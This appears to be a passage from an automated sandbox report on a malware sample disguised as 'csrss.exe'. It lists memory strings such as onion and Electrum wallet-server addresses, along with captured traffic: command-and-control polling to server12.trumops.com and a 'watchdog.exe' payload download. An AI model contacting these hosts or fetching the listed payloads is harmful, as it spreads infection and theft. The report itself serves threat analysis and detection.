            Source: csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmpString found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
            Source: csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmpString found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
            Source: csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpString found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 20 Oct 2021 10:39:11 GMTContent-Type: application/octet-streamContent-Length: 2102272Connection: keep-alivecontent-disposition: attachment; filename=watchdog.exeetag: "616ea494-201400"last-modified: Tue, 19 Oct 2021 10:57:24 GMTCache-Control: max-age=3600CF-Cache-Status: HITAge: 2344Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=um4jgmu5MJYrCALOja4WSnT%2BKIqMmUbFD6XsWL2Jk3lxPjw2VqysVmcC9mrM%2BGwFqp0T%2Bv78FIyQfHnQlthqFSIsBnaG1oJt9USn6g%2BEBiwQGd5bp0SiF0DtnQnx"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingServer: cloudflareCF-RAY: 6a119ef28d8f68f2-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 00 00 00 00 00 b4 4b 00 00 00 00 00 e0 00 03 03 0b 01 03 00 00 10 20 00 00 10 00 00 00 70 2d 00 00 8d 4d 00 00 80 2d 00 00 90 4d 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 a0 4d 00 00 10 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 90 4d 00 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 70 2d 00 00 10 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 10 20 00 00 80 2d 00 00 10 20 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 55 50 58 32 00 00 00 00 00 10 00 00 00 90 4d 00 00 02 00 00 00 12 20 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELK p-M-M@MMUPX0p-UPX1 - @UPX2M
            Source: global trafficHTTP traffic detected: POST /api/poll HTTP/1.1Host: server12.trumops.comUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:74.0) Gecko/20100101 Firefox/74.0Content-Length: 644Accept-Encoding: gzip
            Source: global trafficHTTP traffic detected: POST /api/poll HTTP/1.1Host: server12.trumops.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 YaBrowser/20.2.4.143 Yowser/2.5 Safari/537.36Content-Length: 664Accept-Encoding: gzip
            Source: global trafficHTTP traffic detected: POST /api/poll HTTP/1.1Host: server12.trumops.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36Content-Length: 664Accept-Encoding: gzip
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
            Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
            Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Oct 2021 10:38:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/8.0.11CF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bgH1j2HJCY1PRrFLZl7AB6WEYhGar0eyGh1Olq8Yrqc4KyXlqKkIUG1R2oMtRRN4E%2B5caViwgYNDD%2BHbwz0YxpqhoClLcU1HQOg3gjevpe9gtDOl1RdkeurtWdZscezbsM8CVdgC9Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6a119e7accff4a85-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Oct 2021 10:38:57 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/8.0.11set-cookie: PHPSESSID=er4u6n5slre08iuqa9ddhgfmgo; path=/; HttpOnlyexpires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cacheaccess-control-allow-credentials: falseCF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Rgb7JlualPWZhQeqXYWeh98Yrz9b8%2BunEhKY0AvJLX2REx0Xd8N8HyfLKgF2ERcI3yi3xhLeBgnu5NHC6J9E5ruHDbsbBALuGedShIpMoxThl84EGih4rVj%2FVnDNpL%2BZGrUMIAbITQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6a119e9beb7542db-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Oct 2021 10:39:42 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/8.0.11set-cookie: PHPSESSID=ihictia5gvlqkfgn9rmhuf8pgc; path=/; HttpOnlyexpires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cacheaccess-control-allow-credentials: falseCF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VuZcu8Rp0SwcfAOzPsHBuPj8LCUZ6Ql2CEt1HD5sqBnqtU7hoJEDNbHv2yW9Dp%2FVUrCT%2FMt5dFBhjq16uaYLIFwI0FrCkFe%2BuY0VdV4IHuLCKxmh8AywoOMlraByjzwDwLVsZ8YsgQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6a119fb55fa42488-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Oct 2021 10:41:01 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/8.0.11set-cookie: PHPSESSID=r0bvjm1tq2m76j34nbfn7o10n5; path=/; HttpOnlyexpires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cacheaccess-control-allow-credentials: falseCF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4VproYKIjqRa5RSHQqMpqU3WrJiRn2KWRmnj96dUzXH3TZePk9Kqh%2F4AwUlTri5%2FQ9kQkVvBt%2B3ca7g1AsCTMQt5dvyz91Q3y2ZTNtGrdiVJaPbYOuTh0im3PuIagx%2BOd7HgGnw%2FQA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6a11a19e1ed14de2-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
            Source: csrss.exeString found in binary or memory: .30 Version/10.61facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)tls: received unexpected handshake message of type %T when waiting for %TBlackBerry7100i/4.1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/103Mozilla/5.0 (Windows NT equals www.facebook.com (Facebook)
            Source: csrss.exeString found in binary or memory: lla/5.0 (compatible; Konqueror/3.3; Linux 2.6.8-gentoo-r3; X11;facebookscraper/1.0( http://www.facebook.com/sharescraper_help.php)2695994666715063979466701508701962594045780771442439172168272236806126959946667150639794667015087019630673557916260026308143510066 equals www.facebook.com (Facebook)
            Source: csrss.exeString found in binary or memory: http://archive.org/details/archive.org_bot)Mozilla/5.0
            Source: csrss.exeString found in binary or memory: http://builtwith.com/biup)
            Source: f6oNLRKHUy.exe, 00000001.00000002.359410341.00000000009FB000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368261402.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.626664196.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389724322.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391449877.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404732093.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.406989767.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427329683.00000000009FB000.00000040.00020000.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
            Source: f6oNLRKHUy.exe, 00000001.00000002.359410341.00000000009FB000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368261402.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.626664196.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389724322.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391449877.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404732093.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.406989767.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427329683.00000000009FB000.00000040.00020000.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
            Source: f6oNLRKHUy.exe, 00000001.00000002.359410341.00000000009FB000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368261402.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.626664196.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389724322.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391449877.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404732093.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.406989767.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427329683.00000000009FB000.00000040.00020000.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
            Source: csrss.exe, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpString found in binary or memory: http://devlog.gregarius.net/docs/ua)Links
            Source: csrss.exeString found in binary or memory: http://gais.cs.ccu.edu.tw/robot.php)Gulper
            Source: csrss.exe, 00000008.00000003.413719925.00000000118F6000.00000004.00000001.sdmpString found in binary or memory: http://gohnot.com/0281c43f36eb9f47aab5357d48bbc076
            Source: csrss.exe, 00000008.00000002.630186142.00000000118DC000.00000004.00000001.sdmpString found in binary or memory: http://gohnot.com/0281c43f36eb9f47aab5357d48bbc076/watchdog.exe
            Source: csrss.exeString found in binary or memory: http://grub.org)Mozilla/5.0
            Source: csrss.exeString found in binary or memory: http://help.ya
            Source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmpString found in binary or memory: http://https://_bad_pdb_file.pdb
            Source: csrss.exe, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpString found in binary or memory: http://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna:
            Source: csrss.exeString found in binary or memory: http://misc.yahoo.com.cn/he
            Source: csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpString found in binary or memory: http://newscommer.com/app/app.exe
            Source: csrss.exeString found in binary or memory: http://search.msn.com/msnb
            Source: csrss.exe, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpString found in binary or memory: http://search.msn.com/msnbot.htm)msnbot/1.1
            Source: csrss.exe, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpString found in binary or memory: http://search.msn.com/msnbot.htm)net/http:
            Source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpString found in binary or memory: http://search.msn.com/msnbot.htm)pkcs7:
            Source: csrss.exeString found in binary or memory: http://www.alexa.com/help/webmasters;
            Source: csrss.exeString found in binary or memory: http://www.archive.org/details/archive.org_bot)Opera/9.80
            Source: csrss.exe, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpString found in binary or memory: http://www.avantbrowser.com)MOT-V9mm/00.62
            Source: csrss.exeString found in binary or memory: http://www.baidu.com/search/spide
            Source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpString found in binary or memory: http://www.baidu.com/search/spider.htm)MobileSafari/600.1.4
            Source: csrss.exeString found in binary or memory: http://www.bloglines.com)F
            Source: csrss.exeString found in binary or memory: http://www.everyfeed.c
            Source: csrss.exeString found in binary or memory: http://www.exabot.com/go/robot)Opera/9.80
            Source: csrss.exeString found in binary or memory: http://www.google.com/adsbot.html)Encountered
            Source: csrss.exeString found in binary or memory: http://www.google.com/bot.html)Mozilla/5.0
            Source: csrss.exeString found in binary or memory: http://www.google.com/bot.html)tls:
            Source: csrss.exeString found in binary or memory: http://www.google.com/feedfetcher.html)HKLM
            Source: csrss.exeString found in binary or memory: http://www.googlebot.com/bot.html)Links
            Source: csrss.exeString found in binary or memory: http://www.spidersoft.com)Wget/1.9
            Source: csrss.exeString found in binary or memory: http://yandex.com/bots)Opera/9.51
            Source: csrss.exeString found in binary or memory: http://yandex.com/bots)Opera/9.80
            Source: csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpString found in binary or memory: https://blockchain.infoindex
            Source: csrss.exeString found in binary or memory: https://humisnee.com/sbmstart.phpindefinite
            Source: csrss.exe, 00000008.00000003.413843361.00000000118D4000.00000004.00000001.sdmpString found in binary or memory: https://logs.trumops.com
            Source: csrss.exe, 00000008.00000003.413843361.00000000118D4000.00000004.00000001.sdmpString found in binary or memory: https://logs.trumops.comhttps://runmodes.com/api/loghttps://server12.trumops.comDistributorIDCampaig
            Source: csrss.exeString found in binary or memory: https://raw.githubusercontent.com/spesmilo/electrum/master/electrum/servers.jsontls:
            Source: f6oNLRKHUy.exe, 00000001.00000002.362354641.000000001186B000.00000004.00000001.sdmp, f6oNLRKHUy.exe, 00000003.00000002.372262046.00000000118DA000.00000004.00000001.sdmp, csrss.exe, 00000008.00000003.413843361.00000000118D4000.00000004.00000001.sdmp, csrss.exe, 00000010.00000002.392222858.000000001180E000.00000004.00000001.sdmp, csrss.exe, 00000014.00000002.393591108.0000000011810000.00000004.00000001.sdmp, csrss.exe, 00000018.00000002.408613248.00000000118BE000.00000004.00000001.sdmp, csrss.exe, 0000001B.00000002.409426862.0000000011810000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.428953235.0000000011810000.00000004.00000001.sdmpString found in binary or memory: https://retoti.com
            Source: csrss.exe, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpString found in binary or memory: https://retoti.comidentifier
            Source: csrss.exe, 00000008.00000003.413843361.00000000118D4000.00000004.00000001.sdmpString found in binary or memory: https://runmodes.com/api/log
            Source: csrss.exe, 00000008.00000002.630136783.00000000118D4000.00000004.00000001.sdmpString found in binary or memory: https://runmodes.com/api/logGlobal
            Source: csrss.exe, 00000008.00000002.631653082.0000000011A9E000.00000004.00000001.sdmp, csrss.exe, 00000008.00000003.413843361.00000000118D4000.00000004.00000001.sdmpString found in binary or memory: https://server12.trumops.com
            Source: csrss.exe, 00000008.00000002.631627512.0000000011A98000.00000004.00000001.sdmpString found in binary or memory: https://server12.trumops.com/api/cdn?c=177c2a906396ff21&uuid=8cf49c60-c834-48e4-bacd-9cc30e6a4460
            Source: csrss.exe, 00000008.00000002.629064382.000000001180A000.00000004.00000001.sdmpString found in binary or memory: https://server12.trumops.com/api/poll
            Source: csrss.exe, 00000008.00000002.629064382.000000001180A000.00000004.00000001.sdmp, csrss.exe, 00000008.00000003.413843361.00000000118D4000.00000004.00000001.sdmpString found in binary or memory: https://server12.trumops.com/api/pollserver12.trumops.com
